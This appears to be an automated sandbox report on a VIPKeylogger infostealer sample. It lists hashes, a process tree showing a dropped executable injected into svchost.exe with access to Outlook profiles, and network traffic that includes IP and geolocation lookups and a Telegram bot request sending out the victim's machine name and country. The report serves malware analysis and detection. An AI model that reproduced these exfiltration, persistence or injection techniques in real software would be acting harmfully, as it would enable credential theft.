Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    106s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/01/2025, 14:09 UTC

General

  • Target

    3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe

  • Size

    634KB

  • MD5

    80a64f0b8df55d637e135f0eb4fb6b70

  • SHA1

    f491fc184d0f15d789e81577e47446478c10ed53

  • SHA256

    3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8

  • SHA512

    f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432

  • SSDEEP

    12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx

Malware Config

Extracted

Family

vipkeylogger

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
    "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\inhumate\demonetised.exe
      "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3724
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 732
        3⤵
        • Program crash
        PID:2276
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3724 -ip 3724
    1⤵
      PID:4760

    Network

    • flag-us
      DNS
      133.211.185.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.211.185.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      64.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      64.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      checkip.dyndns.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      checkip.dyndns.org
      IN A
      Response
      checkip.dyndns.org
      IN CNAME
      checkip.dyndns.com
      checkip.dyndns.com
      IN A
      132.226.8.169
      checkip.dyndns.com
      IN A
      193.122.6.168
      checkip.dyndns.com
      IN A
      132.226.247.73
      checkip.dyndns.com
      IN A
      158.101.44.242
      checkip.dyndns.com
      IN A
      193.122.130.0
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:25 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:25 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-us
      DNS
      reallyfreegeoip.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      reallyfreegeoip.org
      IN A
      Response
      reallyfreegeoip.org
      IN A
      104.21.112.1
      reallyfreegeoip.org
      IN A
      104.21.32.1
      reallyfreegeoip.org
      IN A
      104.21.64.1
      reallyfreegeoip.org
      IN A
      104.21.96.1
      reallyfreegeoip.org
      IN A
      104.21.80.1
      reallyfreegeoip.org
      IN A
      104.21.16.1
      reallyfreegeoip.org
      IN A
      104.21.48.1
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xmql4eDt0UjHAS%2Fd%2FJNg%2Bcl9WFHOJezCToQ3QOlJcud4WVg06xARq3pmfpme2PRwnNZUsyp5eF7NCYMgpsmQDd3NuNTCzkeN3gnxNQaXYyr%2Fv%2B3Fhcfu9HnLts%2B4h6xZ2G3H5kCw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eaa3e616535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=29594&min_rtt=26499&rtt_var=11354&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=134993&cwnd=253&unsent_bytes=0&cid=0a49e2d9766b0697&ts=100&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jXQrgq0%2B9%2BwWWLpglyEy9oCQ3SEgjnRNnrEyy6XRxIlSQ9CIdWLxibEwWiCqOMbhkQYV%2FJBlz9%2FvwlzISfkqYTnGPWaD%2BpvqvYO8DhRj1q87BFVzWRR%2BZ0HmD57Zt1rb8toYUp5"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eac38946535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=35532&min_rtt=26499&rtt_var=20390&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4285&recv_bytes=482&delivery_rate=134993&cwnd=254&unsent_bytes=0&cid=0a49e2d9766b0697&ts=417&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DD6jpCQGRdDkdH%2FXt%2Bk2vJ1%2FQIz5%2BAq01qeva1elusGj1tUy5ZacZS19EV0yUSJzMHfJWp3ZggyDhRC9f7W%2FlAGmvm1x2uXnIofGBbSjwUyaKJ2HuyJ%2FTmv9BxDaV6fzsPcmXPFY"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eae2adf6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=40190&min_rtt=26499&rtt_var=24609&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5561&recv_bytes=574&delivery_rate=134993&cwnd=255&unsent_bytes=0&cid=0a49e2d9766b0697&ts=731&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkaxaa88JcVy4GwOGEsDf8DXnH6cEPt55nLgZ8qiGFgxS22l7GClfDGAWgRYs6d%2FcYacmYxBcwtskJfXZN5xc%2FVp0cQHBAcG4JE5JC3UzmbYV7ZQse2cvD21DV223PypPKJ0TzQs"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb02d3f6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=44132&min_rtt=26499&rtt_var=26341&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6838&recv_bytes=666&delivery_rate=134993&cwnd=256&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1038&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBUXWbBxMK06GGHl1qY6VIRCstIvlGIRXlnO%2Frqtr%2Bm2lFEMm9Xh%2B%2BPook%2FrddxTRktE4UlsbAeN8SomnX7jq6Phetl3Nqm5dGFcn5thK5Bt%2Fotl3kf%2Fm3nPw5Kf8Dn5Tyo0cEDB"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb21fbb6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=48230&min_rtt=26499&rtt_var=27951&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8108&recv_bytes=758&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1358&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=houIjoiAgglyLyOKmEx%2FngSfQOroRZr68erIwrSWPpvY8Cc7nPIe%2BSOWkdhhaJDptIv5hMyMznSv0vSE4dkbWVZeImHYRMj1sj3z4xXaYNQ5NMCktzLZJpYvWlwm4m9ND4iVAcgv"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb43ab06535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=50828&min_rtt=26499&rtt_var=26159&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9388&recv_bytes=850&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1692&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sG8Dr5L%2FkW34t57BiPLEPBEF%2BZfYuV6nMlF8NjMwsK7rsiKW1zeM8JP48R4FIae93DkOzMhDYfg9zshE%2FFopkU%2Fa%2BGTkoSXgipjC565b4xMMt9hojTfrx7CChVfXZrlnKd40kcpV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb63d566535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=54365&min_rtt=26499&rtt_var=26694&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10659&recv_bytes=942&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2014&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5tDYMR%2F%2FB5VxijW9L9MbBtpYIp186Eknhh85ynLO%2BexHENfaN4DkXJ%2FQAShWaVw0PBUip9OQ7F2JqZvtZOH5AMbXh1ae1U3e0yW0OLh1jUKswPKwM968JQT6wWOenkcZ0MytuKz"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb828086535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=56265&min_rtt=26499&rtt_var=23820&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11937&recv_bytes=1034&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2325&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXb0D9amDkAinM9ToP3pnIMedRA2l0CFwXLlL8nN6vmalADfbJXUleBRd%2F80C6RqRaNWP%2BFZdlpKJmbhPYK0s8bBHu5fKEhTDN70T0e%2B6KgeK3ZM3GKEDCig0j2VOsFWvjk3eSgV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eba2a526535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=58168&min_rtt=26499&rtt_var=21672&sent=13&recv=22&lost=0&retrans=0&sent_bytes=13214&recv_bytes=1126&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2641&x=0"
    • flag-us
      DNS
      169.8.226.132.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      169.8.226.132.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.112.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      api.telegram.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-nl
      GET
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      svchost.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx/1.18.0
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: application/json
      Content-Length: 55
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      217.135.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.135.221.88.in-addr.arpa
      IN PTR
      Response
      217.135.221.88.in-addr.arpa
      IN PTR
      a88-221-135-217deploystaticakamaitechnologiescom
    • 132.226.8.169:80
      http://checkip.dyndns.org/
      http
      svchost.exe
      2.2kB
      3.4kB
      21
      15

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200
    • 104.21.112.1:443
      https://reallyfreegeoip.org/xml/181.215.176.83
      tls, http
      svchost.exe
      2.2kB
      15.1kB
      25
      16

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      tls, http
      svchost.exe
      1.2kB
      6.7kB
      12
      11

      HTTP Request

      GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

      HTTP Response

      404
    • 8.8.8.8:53
      133.211.185.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      133.211.185.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      64.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      64.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      checkip.dyndns.org
      dns
      svchost.exe
      64 B
      176 B
      1
      1

      DNS Request

      checkip.dyndns.org

      DNS Response

      132.226.8.169
      193.122.6.168
      132.226.247.73
      158.101.44.242
      193.122.130.0

    • 8.8.8.8:53
      reallyfreegeoip.org
      dns
      svchost.exe
      65 B
      177 B
      1
      1

      DNS Request

      reallyfreegeoip.org

      DNS Response

      104.21.112.1
      104.21.32.1
      104.21.64.1
      104.21.96.1
      104.21.80.1
      104.21.16.1
      104.21.48.1

    • 8.8.8.8:53
      169.8.226.132.in-addr.arpa
      dns
      72 B
      157 B
      1
      1

      DNS Request

      169.8.226.132.in-addr.arpa

    • 8.8.8.8:53
      1.112.21.104.in-addr.arpa
      dns
      71 B
      133 B
